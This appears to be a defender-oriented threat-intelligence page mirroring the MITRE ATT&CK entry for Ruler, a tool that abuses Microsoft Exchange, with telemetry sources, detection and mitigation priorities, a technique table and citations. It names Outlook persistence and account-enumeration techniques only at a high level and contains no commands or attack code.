S0358: Ruler
Analyst context for executives and security teams
Ruler matters because it targets Microsoft Exchange and Outlook-related services that many organizations treat as trusted business infrastructure. Even without ATT&CK-provided detection guidance, the relationships show decision-relevant risk: the tool is associated with email account discovery and Outlook-based persistence methods. For leaders, this is an email-platform resilience issue, not just an endpoint tooling issue.
Executive priority
Prioritize validation around Exchange and Office Suite visibility where email compromise would disrupt operations, executive communications, investigations, or compliance evidence. Security leaders should ask whether the SOC can see suspicious command-line use against Exchange services, mailbox rule/form/home page changes, and email account enumeration activity. The APT33 relationship raises threat-intelligence relevance, but local exposure and control priority should be based on whether the organization operates Microsoft Exchange/Outlook environments and collects the necessary telemetry.
Technical view
Ruler is a publicly available command-line tool for abusing Microsoft Exchange services on Windows and Office Suite environments. ATT&CK links it to Email Account discovery and Outlook persistence techniques involving Outlook Forms, Outlook Home Page, and Outlook Rules. SOC and IR teams should validate coverage for Exchange service interactions, Outlook mailbox configuration changes, and endpoint command execution that could indicate unauthorized tooling. Because the official object provides no detection text, detections should be built and tested against the related techniques rather than assuming tool-name matching is sufficient.
Likely telemetry
- Windows process creation and command-line telemetry
- Exchange server and Exchange service access logs
- Mailbox audit logs for Outlook rule, form, and home page changes
- Office/Outlook client activity where available
- Authentication logs tied to Exchange or mailbox access
Detection direction
- Validate whether Exchange and mailbox audit logging captures changes associated with Outlook Rules, Outlook Forms, and Outlook Home Page persistence.
- Correlate command-line execution on Windows systems with Exchange or mailbox access events rather than relying only on process names or public tool indicators.
- Review account discovery patterns involving email address lists or mailbox enumeration, especially when followed by Outlook persistence changes.
- Tune for legitimate administrative mailbox management to reduce false positives; Exchange administrators and help desk workflows may create benign mailbox rules or configuration changes.
- Assess whether NotRuler or similar defensive checks are appropriate for environment-specific validation, since ATT&CK notes its existence but does not provide guaranteed detection logic.
Mitigation priorities
- Confirm whether Microsoft Exchange and Outlook features in use are covered by mailbox auditing and centralized log retention.
- Restrict and monitor administrative access to Exchange and mailbox configuration capabilities using least privilege.
- Harden identity controls for mailbox access, including review of privileged and high-risk accounts.
- Establish IR playbooks for suspicious mailbox rule, form, or home page persistence, including evidence preservation and account review.
- Use the related ATT&CK techniques to drive control testing and compliance evidence for email-platform monitoring.
Analyst notes and limits
The most useful defensive framing comes from the relationships: Ruler uses Email Account discovery and Outlook persistence techniques. The supplied relationship to APT33 should be treated as threat-intelligence context only; it does not prove current activity or exposure in any environment. The public GitHub and NotRuler references support awareness that both offensive and defensive tooling exist, but local validation is still required.
ATT&CK provides no official detection text and no object-level tactics for Ruler. The supplied data does not justify claims about active exploitation, specific campaigns, guaranteed detections, or customer exposure. Recommendations must be adapted to the organization’s actual Exchange/Office deployment, logging configuration, and administrative workflows.
Ruler
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1137.005 | Outlook Rules Sub-technique | Ruler can be used to automate the abuse of Outlook Rules to establish persistence.CitationSensePost Ruler GitHub |
| Enterprise | T1137.003 | Outlook Forms Sub-technique | Ruler can be used to automate the abuse of Outlook Forms to establish persistence.CitationSensePost Ruler GitHub |
| Enterprise | T1137.004 | Outlook Home Page Sub-technique | Ruler can be used to automate the abuse of Outlook Home Pages to establish persistence.CitationSensePost Ruler GitHub |
| Enterprise | T1087.003 | Email Account Sub-technique | Ruler can be used to enumerate Exchange users and dump the GAL.CitationSensePost Ruler GitHub |
Groups, software, and campaigns
G0064: APT33
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.1 | Current bundle | bfb0b85e1472… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
SensePost Ruler GitHub
SensePost. (2016, August 18). Ruler: A tool to abuse Exchange services. Retrieved February 4, 2019.
Open source URL -
[2]
SensePost NotRuler
SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.
Open source URL -
[3]
mitre-attack S0358Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.